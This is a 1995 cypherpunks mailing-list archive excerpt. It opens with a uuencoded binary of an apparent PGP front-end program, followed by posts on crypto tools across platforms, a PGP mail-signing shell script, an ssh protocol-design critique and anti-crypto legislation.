JFVY%!L1+<"'C-!@:]$#[J4),!T4DH2*'&_/N_#[ Z]7:?1:Q#\5D>%FM M:\5JEJ/]F:-*Y @+/4N\!$\U+Z(5-R[?8O265)&F +HS\R,P$R)'B Y71,"0M M""Z19NB0T8"2Z,$"'>DS[U!"*&X ]8378:% ?*9WM M,$E 1+6U\+HM\XZ=-.-925/))*Z2&+ :+:;Z5<.VG!& 662&:J3S@%##WBGAM M&4;",M:J;_,&-GS:6$ETL7%X",XO5J[2L6%*)7'( .'P%00\ !OC\ YY!E$T:ASZ$(N\888XT3.;:M M#!2,(#&"" ,Y"(Y;J\Z; ^)&G"W0>['BCM)D!E"7.(*,PTS-AL@&4+"Z,_$Q8)7&F/$6/9A (%1H?6*V.$)W >EEY X928_/<#,-3-:M MDT',&:"E)])*H%R6:Y%"2[@1BD0V;3:2B=E*&%%\.$SNM>(N(.[-[HP\8GH;M M&P/NURL7&Q'2$@(6#N9U*IBIM MO&)2CR0JQQ+H')Z 806T0KXPRW5VW7^YY7KYS[;:[4=-H-M M_Z(RN!UH2][ZTJZVO+(8M( AW>OSGM^^*(N^5\,OMDYAX"!..26K,%\!RR9PM MQ,P(EIY7\'F1[/IY7M MHC at B(:_ 'VD IG>WRW#LRTB+OI(@/PC>(-D"\PQ^$@BS'9!J8J% .GZI\.%.M M8&Y"C0BK'6 &P4Q!#L(RJVUE+$I&1E4)C&"\P*("0H38A/6;?AS*E"TM/BIYM M/%.EHH=$N9K1R@$\E=(0>FW0:[[J7_J-P:MZA2!576-%1*#X!E:RHL1ATS at XM MH0LFWE;$('0GG^P[\Z_>-_5;O=_K^ %A7OUBO9<@Q#63,8M MFHH W7] LI#8#!/,CR 'U$$KK=).5$*,8/PH4E.PN8Q>Z;^/6C;MUTP";F1;M M[$"2A&HDP2$Q 7UQ%R.HM M2TV_?6476.(7G4".+0E9!8CVE4RM(=JP/\9&P$)7X--HB5%N/79FUVLX8!GVM MX4&V V]/(-&>8OTL@[>B'YJ0G5AQ85C+ at 05OLQTS0(5$0)0Z-RZ&1<^Y/$H3M M&BDO.WAJXRVQRM0P^>Z "H#K& ;,&C.5$IQ!I+:^&O>M M_QDM8MY4H^T.8#&Z[*(FL;F;0'4FU^F* ()3*H9A-,/6A_=P ,N-+3EQ].N&M M33IDK-%>8#(;\#:4D3"S&P1<__7( ?)B0V1?%!,,8/X7F4E[N.1%53-Q> A M M at 4SY*B& N-!S$(Z5>J&S2HCP#.U'BLM ML% 88^"0[0/Z_E1KQ4O>YF)-99-,>FJ at E(SP)7')*+*.< E>'[<2.IS/.9Y?M MD]%"V7@#5W8/A#$8 @94.H]TNJ\='+I$S#R*$@5F QH='>=3.E982,A at 3<)GM MS4=A#8UC-I;Y0['!;:1IN(BF.2>)VWJJ(_IH4T,P?DZ3Z93<,"*&/,%AFZ:WM M\$P(=7#E at 6PDT[O"2KTLZO%D at FV5;R7S+(DKT9!V$%%;L0(?A"EO*1[8$,Q M MRGA+%O%X&&8ZTU#8%U.9F&I.L&0#8J3W39U:_(&S+=!U_:E74*NP-QP/X&_ at M MS0MGCM%\&(+(&DBD7S"Z]:76;L";I,3(;&V4)M^AMO "(';Z H8S_!!BNY1*!+,S9( NP**ZB]#>HMM MJJD-/CH#[X/PV3>;\-L)"[C$"/$\"P(Y-!NG+%*.J5U- UO!M;A.'!1;B(L,M M["TBQSS'2 at B(7\@%4I,V<-A9U+&PX!-A37,5;Z"M:\%2UTTV3)#C;!=8/]2(9D:5T#KJ]VW6M M]\!L63O%CUU$-;-MOKW=U;"CQ[HKY487'J[:I20^$M=$M$512Z3)1P8M M6%PY5M0QG["!+\:A2^4( )9#)'AQ8Z>TX]G(K\0W=OG *BU4O.^EK>B PT6TM MN3II*39X-",!O$UR(URF2?V05?$AO0^.'+?Y[5BS:4-I)69CE&5P!8*37!FCM MVQIJ+< L#C=-<#M?DH,V.^CP/V>SC+:8HW%,-4=='OSO&S893$($-#VD.VJ'9H-ONM MK5#W at X3E7%#C8^, /?G##\U,LJ at GX\*K*3_RUI835S[^Z7G=9K7FZ8T0\@6ZM MP"I>HH ?XEXLOTH$&"#HQ]'!M3S$I;PG,B F$&SR>"-M19WB7(VCN+0?34N at M M^"7 at Z11D&W0C_L at 1-X"-'JU/W&%S'P;@?BW!O<>%Z;;$W=:_HMM M;^#U^GL ZO1 V?K^1;LZN.YYHG;IU:[$C=]LBD;5;_ZBR9T=;',?UT^DMY^GM MR?TT-D9N(LV0'![KTQO$+MJB!=C=@9I6"T03O\ONC)N ^)]L,2(*]RIY&!H/# C#G'SQOM MQ0PV>#@=<_KCT)3GW32UMLK^-!J%+;4<<0"QW?U#JASE#S5/Z&KXWNC at _V>XM M89MDU)J@^7-W?[!-&\328= CM'$H;8GSE]'FKR#-?TR9I9;=NF(=:_%^V":,M M at C2A,J;&J!$U!M*8IW%!@0BC;#Z5')7#%U0HU&0J9IA=OZQM8_7X!8RFGD1#BZ>D.PTA>9X?/3D% 26M?]M M at 2[D.-&-T)D X_HT)%K8"/,!30FL*0,_J?:<[:"$Q.;6S.P2<@V:98O'[#&GM MW>5!$U;MUWQ?5-,9U at _)Z\^24.TIXK6IDBF0;^>F'$R3Z>KLTY X)H<5E3KMM MDE-^IVBQ3)A2H+O'ZD#]D2; ^_06GW(WM2& OCWA),\4A#GOM!^J+<;^"%M MZ+"*25-F+ at K/CW],(FT%RF9H&_N'6K115D179MDJ2<,M2(62IVH&61@;F&);M M4+>X[:'C5-;D5"O#BD-N, at EV 3, 3WL23P'BIA;)'7%1J*1N#>&LB1,8F>YAM M[,:)+C!C?R]N'1$>A&!@FN%6V):[G]U,4KNYB%U?W%K!Z^ESU>]*[Q'OE<38M M?<6]C![!195L=3N]0;4]T%+>M[N3+;(\%<4:N*_8#ESR9V?NO<-F!WR]"S3^XIC_B,/\W%^66%PC2M M9ZQZF?5LZ(%X5!6*"?:*>Y?)=&G$#UM,J-(TH at YI?21F#S"%+7"T2WN.B?ICM M 0FM-7'-'O]$M :/NH^7V2SQU*IMVL AEH,B/$XS%.K^ MIOV]N24WL;L:1(\HT>&G01L7=M MHPHBN=.K8KD:/*#'9C[Y!#TVLO@]U7P71[?/??STL\G18 at 7HDOX#;?H3#-TRM M,7]&F0S2?UR9_J]T:7N1.W3)+.+_1W8*!/^D[&!MJ25C2*#Y$,>&GWS$2^("M M9G;,'W3;#SR;(>Y>E;/''-N^&=W_ at 6/#S=,K[B at U=D5_"H&0N,&*AX(L";+]M M:[&F(&0K23A3$?V4=?WA/RQS_3&EE@=/OVHW8''EM.1DLZ65\L8]Q&"*&Y*.M M at K^$W"S.N74& OD26$ ,P-0>9@)COF&60&2K2MRMC %NF. at 2$SJ)\M-06/JHM MP'].6P7>P*L7X)#;L5KM%<)E).5V;;_\XC:O4(=\;CJS;DQH?Q48JT^J0,)K8&Q'JRA-@,E(=^5OM M8 *YH-Y;!3*YDA8G0D$V2NW at V,=!K6FTM[ N=&RHD *X)0[D !8]6 Z?+2K*M MFGSU?=K8F at G:LD4;RAL:D4*,'(>&Y0 4QEAEMA7QTFMV'R0PYF-,- H$M M;CM;2VUC&Q!C>K![Z(K/6"&;Z57;6WTXT2= ]I#_[;)P<8[#T&2?*BA2S1I1M M]P YXK4#:]NP '.4:$#)Z5-V;H/8OA=A]\FGM!L[$S2X7.X9L=-;H9'8I;9+SGKO#,BZ2V9&RY06G0A\G)05M2Z=UVVV0;M M*I2,D 5+MT)AQR*(*QW;VMI2MW!FMB4]3K / AVZ/F1N.[>HNX at +I8#+$)ZOM M'P+2W>M2?*[[_2N^* "/+1#/!ZUNT>.O]SKH/>< $:+XD#KR")^W;VM-K]JSY_^P)]Q"HN9P/H6/94LZM MN[N(S3+HP at 2T!+KCFXAI@=!8"TD?-X%P!*7>FB6A.RJY_J<;.[&OPZ@,^FN7M MS!,PF^9D#G5<6P:V.YVVA\M;X4D8JJ88)\.--D3% B%;/:6C2> 1X!WP+-1(M MHD]I.L=5MDYL6#"&K2QY.?=08LF9VSU13^ 9+\PY$V+\-*%)T[6M M682>.Z0",3?WBE"BUPZQ&75"J;*Y4,$VE:/:$O,1-O:=,C9XM M=(9:XOEL!IVOT\?J<9^,D,4&U*2,+Q(DUV#P?I4YTLX=BF4^QZM,\^&.IL/BM M5 at O05J.L=&#B!350(18Y at B4=(\M-VQ[FR3*2#%^;/M_9TIA$>FM MT;Z]P)[N691SW1,F/G[[%M:0XRE14]9TCS"2"^/-)G0Y4XQCL;,W-!55]Z0 at M M'U:A35^T#T5++D'!&Q!R" OIJA?M#[B;&_O=BH,[.LS526UA)GEZLJLV9D^5M M>\X4+3_VG6+?'+!"17CH;/,HQ":^[)_IF-0TP5Q?T%%Y0Q,]DVY$MR#H^*1?M M-\$W1XYLNQ4=#Z"^<@3H[HP%UL3 at ATIF3%>^Y(575YQV?_1JIY\:9AU= )6%M M#-(DR\@K\I5!P!LRL[H]GW(8/!()R4JF+0A%OVR7$[14,M]E2_0U+V1M3.*0M MJODTHJT_:LD?:PNH%\!L EL%60]2ZA(XC;3W0:7O*6Q DQ at FUDI&Z+R&*<2[M M_S '36 =NS GF;.'KY.BBY O#Z)($6E-0!Y!@L(%/)FNSECOR-B+09!C5_*@LIC%%14NM M8%#5&*\#3;7KOC/=P[N\MD$_?:N:^9S]]NY4=.5T)OK@,MHW#]^H01 at K>G(>M MA2!=K;9X^_;TY,2'AZ?O'EKB+IQ.=DV$8L+[(K[M M0)2;@].!3-,\9AOLZYW: 9\\U1<6<%^ZM MEM at -\Q&#DF47RIU[U0A7O_#HR21)*^9V#[.*9!4#M3%*9Y@?K!/-PN*V%L &[_WB>US8YDZB(=4*S"DS%R5S.8OQ=':AM MTNU%A[!RB1NCYLZQ:'-3TDHA%W]R?=T!PBP]=JU-I50LZ)0Y.%+$&GW+%V<%M M%$M/S04'7.U@@NMT!F^$RS9T%[SK?[VMO'Y]W:=0$I-2[<0SOJMEAET+F>(M#1L>_=^Y.::TPM MJ@^_W%1[O6I[\$5 ;EIK5OV6URMH\NBE$;.J^Q<]X0Y% :W%"SI6YOX+8NYGB123#F5HIKE.H'B\WA1CB4B<[BLM MN,?- at -"'\\IL at Y+\=3]5;@,) +L.H$BT'LS/C'=!/RZ79'>)^]]D#TM M+ZO-IKCPS\\[;5'KM+K7H#9X?*]^71OTL13:]*OG34\TL"&Z_<5NF72]FE]MM ME@%8S:\#)/Q>Z[3[WJ=K^$L_JOL]KS; 7NJ^W_*;D+[7JZWJA=>WE4P8WKRNM MXRT&^@E-U.Q 'MMIB//KOM_VX#N=)QSTR_:78BV ;^^Z._ [$%,_&.>W 5RKM MRD\!<&=PBI9+GU"]Z%5;92*P\!N/$_>RB at 2&EZKUSW[?J]O*+,_=!:1\M M/1'\U+^N71HB%1G44_=Q/A8/6G\)," D=^ XFV#D*P:8/H =S(X at U_'KB& =M M$R#^7'.T^_P9Y$/@45X?GQ[5&F\:WJGWEJZ./7K][NC-ZP>(B;_M"&Y^?_[LM M:G-?3?P=$I6Z>'\J3NKBU!/'K\59731JXO@=6//W,(-X_5;4WHOSM^+X7)R\M M$]X9$^80/^?@!MJ4NOB=Y>S4<]G^DM MT=?S[-7KWU8?K\?-SXTPD^W9CX\0X-R^_1+<>.F/QH]1_[IW]>9\>3ONO5M]M M/ZI^C!LK^<-OK;]^>W_V(^R,TG'C0GW_>%WO];K=RU>#:;5Z/7C^+*]]O1H>M M3Q:^UX)_OZ[E33L-CL\6?OU^%LRFW^1)>SF\.X_ES<=H>'RZ^')\EG>3N^KTM MD]_P:J?GSY^]ODGR[MF;=_,OS?>+E7>NQDG]Z$2FX%_]QJ+3!EJ>G7U]TYPWM MWKZ]>%6?C)??P^GZM',9W76/.I/@^;.S66?\Q5^W!]\OEH/5\.NHEB;SL!&&M MW]][-]7;;E7Z@%[0ZUY^]F:3>K/Q)6U5TU&W]6KV6^-5O_7\V44C6C<'[R>UM MQD4K:EY\.GK_^=/=,KV[^+$\[;V[>C7(U8]N%G8^+=7)Y]7'UMER<-JL+3OKM MBQ]O\C<_P+-%GVJ?J^/K3\V1.DK>.E3ZY%5O5]U75QVY"K_'R?IS^_9-L'H_M M&7I?O_;DRW]>7=Z[.Z.KV:OIXTN[]UM M9M_2V^7Y;YT14/_C]=?@-#R7S8O.Q=&762R;)ZOT(J]]>??U^_)KM]N=A^'[M MW at 12PG<7?EC]?CD.7K?^_OS9W]=5;/(F^?7:]9\)]_-G_P-02P,$% " @ M M/ 9['5I7WE#H 0 X04 P !214=)4U1%4BY&4DVM5$MKVT 0OHOH/\PAM MT!H2X5P-A10G,;JDH at DYM)2RWAU)2U:[ZCX2].\[:TF.:QS%AHYTV,?,-\_]M M /9D)==KHV%IFC9XM%!8(P+W#HI5 7?6:']YJT6:P*0\H7628*ZR^:3J=ZRDM M\Y;YJ'QG;),F:5(H9 ZAE$J!U.!K6ANES*O4%1V4I-8;,"W H@\V*DD'\0:\M M6420T4-I)7]V1E]7F\0R;C8^OOP?29.S-,G)S9(*P[B'_"V\-+D\+'UP]ZS!M MQ4XI?D_+F-/GV!FFN]GB-+-'Z17.%B=Z^RJ$1>=.-=N7(\V6TG<7\."9[ROSM MH1D<+S]D2TT2.'@R07O;?9#7&-=MPZ3:J<41Z<0OSZ.C5J*CH1Q&'>U[8S'TM M*=="OD at 1F'*S."6A6=,K-.6(M)4KN(;S>3:?Q\TY0%SN#DF#EDNF9C"!0L%.M MH.S+H_%,'>[N at 6:_52&';_2&+:R6Q99.WJ]"[WO@ %XC?P9&1.!KYH&UK>JVM MS_LG_((') YH\!]:B/\!A]-&KS5J* .1"4([A'5V/&9_E3;#QU0.\G.H+D)70F0,U>-N; !^T+<*&JT,60:(.Z9IKC<&7QM M3Z"K>.YYU at .U?9VDYBH(C%S9 *6.V5C^OU!+ 0(4!A0 @ ( %NZ>AUD7-6!M M!BP "Y3 + ( "V at 0 !'0U!01U!&12YE>%!+ 0(4!A0 M M ( "NI?!T*W"K-1" '9: , $ ( "V at 2\L !'0U!01U!&M M12Y$;V-02P$"% 84 ( " \!GL=6E?>4.@! #A!0 # ! " M MMH&=3 4D5'25-415(N1E)-4$L%!@ # , K0 *]. %!+ P0*M M !Q0M'>T+!0[[5.*:O@.);+*/\35T2PUW^#HDM MQFJ1'0 at J%2P+4$L#!!0 @ ( " '>QV.B1S(# $ "H" ' 4D5!1"Y-M M1851L6Z#,!38,7X5<80Y>]K4TI5(=2;M MK*>[=^=[18OPR-$#+1P2-)8H1*]A'ES2-TI?GX"-.#]"W-,@*2E*&M M"P6F1=^K24JZ"]5 +23V)]_S/7#(V#D,$@8+BE;T$VFA?&^_,K=]&IS!O1SGM MQ\0N/LWL%18Y>ULL$!@DO-0T._VC#%\OO\J*RJ%#:VL$J2UIQJ(X+U at 67+,$M MYM :&]$;/>F@)MUMB=?8AZ1V!NZD]0..1Q!F9TO2B$^'=4UY'"UA[01RT2ANM M!HW39P. =WO!DBL8>K37L74;VHHRQV.B1S(M M# $ "H" ' $ ( "V at 5Y0 !214%$+DU%4$L%!@ # , M *J0 (]1 M M end size 21070 ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From jamesd at echeque.com Sat Jul 15 18:19:26 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 15 Jul 95 18:19:26 PDT Subject: Deployment Message-ID: <199507160119.SAA10662@blob.best.net> At 11:28 PM 7/15/95 +0100, Rev. Mark Grant wrote: > >So, anyone want to volunteer to port Privtool to Windows ? Uh, pardon my ignorance, but what is privtool, and why is it a good thing to port it to windows? (As compared to the task of integrating PGP into microsofts mail tool.) -- ------------------------------------------------------------------ We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state.| jamesd at echeque.com From tcmay at sensemedia.net Sat Jul 15 18:36:09 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Sat, 15 Jul 95 18:36:09 PDT Subject: Unix not the Only Place for "Vanguard" Applications Message-ID: At 12:24 AM 7/16/95, alex wrote: >MS-Windows boxes and Macs still don't do multitasking well; that's going Agreed, certainly. >The preeminence of unix in a lot of the work that's being done isn't the >result of snobbishness or even personal taste. It's just a nice, >convenient platform to do the work on. I certainly would never say the success of Unix is due to snobbishness, though personal taste does play a role. And, historically, the academic/pedantic aspects of Unix played a role in its adoption. (Most important, I think, was that the proliferation of minicomputer and mainframe operating systems was controlled by Unix killing off all the proprietary, vendor-specific OSs.) >People pick the tools they feel comfortable using, and they match them to >the job at hand. I can't run Pagemaker on my linux box so if I need to do >some layout work I use a mac or ms-windows. But if I want to set up a web >server I use linux because it's quick and cheap. If you want to edit a >feature film, use an SGI workstation. If you want to set up a word >processing system that someone from the temp service will be able to run, >use ms-windows and word. Sure. Same here. All I was addressing was the claim that no vanguard apps ever appear on PCs, that Unix is where it all happens. >I'm sure that when windows-95 comes out officially, good tools will appear >for that platform. But the lack of solid multitasking and freely >available development tools in ms-windows 3.11 is the reason that more >robust crypto tools for that platform don't exist, not an ivory tower >mentality on the part of the people doing the work. I certainly have not claimed that. In fact, I'll be the first to concede that Mac users are more ivory tower types, in the sense of being fanatics and advocates for their platform. (Though there are some Unix bigots out there, notably now on Linux....I don't see Linux making any strides in the workstation (SGI, Sun) market, just on the cheap Intel-based boxes people--mostly non-corporate, it seems to me--are buying.) --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From anonymous-remailer at shell.portal.com Sat Jul 15 21:04:29 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 15 Jul 95 21:04:29 PDT Subject: unix, vanguard Message-ID: <199507160403.VAA04878@jobe.shell.portal.com> >The preeminence of unix in a lot of the work that's being done isn't the >result of snobbishness or even personal taste. It's just a nice, >convenient platform to do the work on. There is a well written essay on the "preeminence of unix" at http://gnn.com/gnn/bus/ora/features/history/index.html. It essentially says Unix has survived for so long because universities use it, and you could license it fairly cheap. Most people (I'm talking about 90% of computer users, even more in the future) couldn't care less about features such as tying apps together with shell scripts, pipes, and some bubble gum. >But the lack of solid multitasking and freely available development >tools in ms-windows 3.11 is the reason that more robust crypto tools >for that platform don't exist. What are some "robust crypto tools" that are available for unix, and also aren't available for DOS/Windows? I kinda think the reason more tools aren't available for PCs (Windows/Mac) is because there is no appreciable MARKET for such tools yet. If there were, since PCs have a market share an order of magnitude or two larger than unix, such tools would have a greater influence anyway. -- Karl L. Barrus From hayden at krypton.mankato.msus.edu Sat Jul 15 21:46:30 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Sat, 15 Jul 95 21:46:30 PDT Subject: PINESIGN: Simple Script for Signing Pine Email Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I liked using the mkpgp program for signing email, but found that, quite frankly, it had too many features for me to use, when really all I wanted was a program that would sign my messages easily. This accomplishes just that. If you want to encrypt messages, either use mkpgp or encrypt your messages outside of pine. Instructions are provided as comments within the script. Let me know if you have any problem. ============ ** CUT HERE ** #!/bin/sh # PINESIGN v1.0 # Written by: Robert A. Hayden # PINESIGN is a simple program that will allow you to automatically sign # your email and news messages composed with the Pine 3.89 mail reader. It # may also work with other mail and news programs, but it has not been # tested. # INSTRUCTIONS FOR CONFIGURING PINE # # You need to define the following options in Pine. This can be done # either via the SETUP options in the main menu of Pine, or via editing # the .pinerc. # # A) signature-file=" " (an empty space) # B) enable-alternate-editor-cmd # C) enable-alternate-editor-implicitly (optional but recommended) # D) signature-at-bottom # E) editor= # INSTRUCTIONS FOR CONFIGURING PINESIGN # # The PGP program must be in your path, and the PGPPATH environment # variable must be defined. See the PGP documentation for details. # # Double check that the first line of this program points to sh. # # Edit the SIGPATH and PINEEDITOR variables to point at your signature # (if any) and the editor you wish to use for your Pine mail. Default # signature will be the file .signature in your $HOME directory. # Default editor is pico -z -t. SIGPATH=$HOME/.signature PINEEDITOR='pico -z -t' # INSTRUCTIONS FOR USING PINESIGN # # When you compose a message, you will compose your message as normal. # When you exit your editor (control-X in Pico), you will receive a prompt # asking if you wish to sign the message. If you respond with y, Y or just # press return, you will be prompted for your PGP passphrase and then # dumped back to the address/subject section of Pine. If you type # anything else, your message will not be signed. Your .signature file # will be appended AFTER your digital signature. # # If you have not defined your alternate editor to be run implicitly, you # will need to start it manually. If you do not run the alternate editor, # your .signature file will not be appended and you will also have to do # that manually. It is highly recommended that your define your alternate # editor to run implicitly. ### DO NOT EDIT ANYTHING BELOW THIS LINE ### $PINEEDITOR $1 clear echo -n "Would you like to sign this message with your PGP signature? [y] " read ANS if [ "$ANS" = "y" ] then pgp -sat +comment="PGP Signed with PineSign 1.0" $1 mv $1.asc $1 fi if [ "$ANS" = "Y" ] then pgp -sat +comment="PGP Signed with PineSign 1.0" $1 mv $1.asc $1 fi if [ "$ANS" = "" ] then pgp -sat +comment="PGP Signed with PineSign 1.0" $1 mv $1.asc $1 fi echo " " >> $1 cat $SIGPATH >> $1 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMAiZnTokqlyVGmCFAQGEdwP/bEpO7xcABhc5RTmWg0zfB+42r7GJyURJ b4x36dudJfHV5BWnwS3hK3OyunalPkTjIjoztG5pANL1FU9OWqP3fNqedYzXTzy5 uhmWqVQ40znnDc4iipTRenUZgjI4x7BuXIh+CRoYJ3rvPuvc73ZARRaYzlpgxDBT M1m8RSeMrhE= =kA0H -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From roger at coelacanth.com Sat Jul 15 22:03:54 1995 From: roger at coelacanth.com (Roger Williams) Date: Sat, 15 Jul 95 22:03:54 PDT Subject: speeding detected by civilians In-Reply-To: Message-ID: In article <3u4g3t$pn8 at nntp.crl.com> Buzz at static.noise.net (Buzz White) writes: >> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing >> citizens to check out radar guns from the local police department to >> catch speeders in their community. The radar guns are combined with >> cameras in order to instantaneously capture the car, license number, and the >> rate of speed. The citizens can check out the units for a week at a time. The >> police have stated that they, at this time, will use the data to issue >> warning letters to the violaters. Can they use them to bust COPS that speed? Heh heh. If Vernon Hills has any citizens left with spines, you can bet that the local police are going to start to get a couple hundred pictures of cop cars per week... Hell, I'll bet that I could take that many by *myself* :) -- Roger Williams -- Coelacanth Engineering -- Middleborough, Mass #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 Message-ID: <199507160550.AAA05385@proust.suba.com> > What are some "robust crypto tools" that are available for unix, and also > aren't available for DOS/Windows? Mixmaster, CFS, premail, the alias system at alpha.c2.org, etc. I know there are similar versions of some of these on pc boxes (sfs, secure drive, and private idaho), and those are good packages. But using private idaho on a pc is still a lot more of a hassle than using premail on a unix box (the latter can be completely transparent), and although I haven't seen the source code to private idaho, I'll be willing to bet it's a lot more complicated than the premail script. If you want to do something like Raph's remailer list, would you rather implement it on a pc running windows or with a perl script on a unix box? SFS is a great program, it works well, and it's very useful. But the design of CFS, which runs as an NFS server, is more elegant. Would you rather drop a new cipher into secure drive or sfs, or into CFS? > I kinda think the reason more tools aren't available for PCs (Windows/Mac) > is because there is no appreciable MARKET for such tools yet. If there > were, since PCs have a market share an order of magnitude or two larger > than unix, such tools would have a greater influence anyway. Did the market produce these unix tools? If Zimmermann was a businessman, wouldn't he have produced weak exportable code? Sometimes innovative products create the market, rather than the other way around. If there's a market for remailers, I'm inclined to think it's because we were able to glimpse the possibilities thanks to the original perl based type I remailer. As I said before, unix has a lot of problems. It's a crummy os if you want to write letters or do desktop publishing: even if you have good software to do these things, the system's going to cost you too much if that's all you're using your computer for. But if have an idea for a remailer and you'd like to throw something together over a weekend that will work, it's hard to beat it. From mazieres at pa.dec.com Sat Jul 15 23:20:57 1995 From: mazieres at pa.dec.com (David Mazieres) Date: Sat, 15 Jul 95 23:20:57 PDT Subject: Ssh "security hole": proposed fix In-Reply-To: <199507151502.SAA01269@shadows.cs.hut.fi> Message-ID: <9507160615.AA06186@venus.pa.dec.com> Well, here is the proposed new ssh protocol as I understand it. A -> B: A B -> A: PKb, PKsb, Cb session_id := {PKb, PKsb, Cb}_MD5 A -> B: Cb, {{session_id XOR Kab}_PKsb}_PKb (*) A -> B: {A}_Kab A -> B: {PKa}_Kab B -> A: {{Nb}_PKa}_Kab A -> B: {{Nb, session_id}_MD5}_Kab It does seem to solve the two problems I pointed out. However, I am troubled by how complicated the protocol is, and how much encryption is going on. One of the principles I have heard stated says that more encryption does not mean more security. A good example of that seems be the session key PKsb above. In line (*) of the protocol, you say the session key (or now I guess really session_id XOR Kab) is encrypted first with whichever of Kb, Ksb has the larger modulus. Under normal circumstances (the ones depicted above), the first encryption will be with PKsb. However, if ever PKb were to come first, then PKsb would be completely vulnerable to a "man in the middle" attack, and thus would be completely useless. Wouldn't it make sense to simplify the protocol significantly, so as to make it easier to understand and easier for us to convince ourselves of its robustness? What about something like what follows this message? To come up with the protocol I appended, I took your protocol and stuck the the full context of each message into the message itself, so that none of the previous problems could occur. Then I eliminated all complications like double encryption and challenges that did not add to the security of the protocol. Now granted I'm no authentication expert and could easily have made a mistake here, but at least it will be easier to catch because the protocol is simpler. Who know what the implications of that XOR really are? David PREAMBLE: (1) A -> B: A (2) B -> A: Cb, PKsb, PKb (3) A -> B: {Kab}_PKsb, {A, B, Cb}_Kab (4) B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab SSH_AUTH_RHOSTS: (5) A -> B: 0 SSH_AUTH_RHOSTS_RSA: SSH_AUTH_RSA: (5) A -> B: {{A, B, Cb, Kab}_SKa, PKa}_Kab SSH_AUTH_PASSWORD: (5) A -> B: {Ka}_Kab From mab at crypto.com Sun Jul 16 01:18:30 1995 From: mab at crypto.com (Matt Blaze) Date: Sun, 16 Jul 95 01:18:30 PDT Subject: Unix not the Only Place for "Vanguard" Applications Message-ID: <199507160827.EAA00243@crypto.com> Cypherpunks, as they say, write code. It doesn't really matter very much what platform cypherpunks write code for, as long as we actually write code. Progress comes from getting stuff done and making results available so that others can expand on it and use it, not from sitting around optimizing what should be done (by others, of course) in the future. (Ever notice how, every time this comes up, the question is always something like "why aren't people writing more software for platform X?" and never "I want to write some software - does anyone have any suggestions on which platform would have the most impact?") Every minute spent arguing about whether Unix, DOS, Macs or VIC-20s constitute the optimal platform for writing and deploying crypto software is a minute during which no crypto code is being written or deployed for Unix, DOS, Macs, or VIC-20s. Just write code. For whatever platform you like writing code for. -matt From Buzz at static.noise.net Sun Jul 16 02:12:03 1995 From: Buzz at static.noise.net (Buzz White) Date: Sun, 16 Jul 95 02:12:03 PDT Subject: The Recent Flurry of Anit-Crypto Activity... Why? Message-ID: <3u6oj5$fir@nntp.crl.com> Has anybody given thought to the reasons behind this.. More to the point, the question "Why Now?" comes to my mind. It generally takes (criminal) legislation a couple of years to be effective, i.e. get hammered out, passed, and entered into the US Code by the legislature, then get acted upon by local DA's, then have a court case come to a successful conclusion for the lawmakers. Well, if anybody bothers to look, over the next 2-5 years, some very significant US patents expire concerning crypto - and this opens the door for a truly widespread integration of "difficult" crypto into commonly used systems, by "big name" software manufacturers, who have heretofore shied away due to patent infringement fears (and ITAR restriction, which will hopefully soon fall due to the courts). Lets face it - the real reason that public key crypto hasn't gone over (here in the US) is that there has only been generally ONE source of commercial public key crypto - and they are not concerned with doing anything in a competitive nature (other than using civil lawsuit threats to maintain their monopoly). Shareware and Freeware are great, but it is hard to get most companies to accept them for general usage (The arguments I have had with clients just to get them just to accept binaries compiled with GCC, jeezus!). And Shareware/Freeware (with a few notable exceptions) products do not usually have that "slick" consumer (i.e. computer illiterate) oriented interface that most non-technical users need. As an example, compare how simple the Mac and Windows interfaces are for the most successful products, then look at the interface to PGP - even via Private Idaho and WinPGP or WinFront it is kluge-y. So commercial adaptation is our ultimate best hope (until then, Shareware/Freeware and PGP are our ONLY hope). [climbing into pulpit] So, I posit that this legislative swirl is an attempt to squash true "crypto for the masses" (via real commercial integration) before it gets out "into the world". The C-Punks have midwifed (sp?) this one, and seen to it that crypto has survived its infancy and is thriving in childhood (PGP), but to get it to finally grow up and go out into the world on its own, it needs to be commercially viable. That mean no hassles over the algorithms, etc. The next few years could see crypto leave our loving environment and flourish, or see it get ambushed by government agents with shotguns on the doorstep. That is what our next fight should be -- to delay these laws until they are too late. For once we get crypto truly running free and loose, there will be no way to reign it in again. [climbing out of pulpit] Anybody have a better analysis of the "Why Now" part of the question? I'd love to hear a better reasoned (possibly not as paranoid) opinion, as this one just occurred to me -and I kinda flung it out here without too much forethought. And as for the ambush metaphor, ask somebody about Randy Weaver's wife... Buzz -- Liberals and Conservatives differ only in what they regulate and which part of government power they increase. One wants to control your money, the other your soul. No Thanks - I'll keep my money and my soul for myself. From Andrew.Spring at ping.be Sun Jul 16 04:52:06 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sun, 16 Jul 95 04:52:06 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: >ranked as a mobster 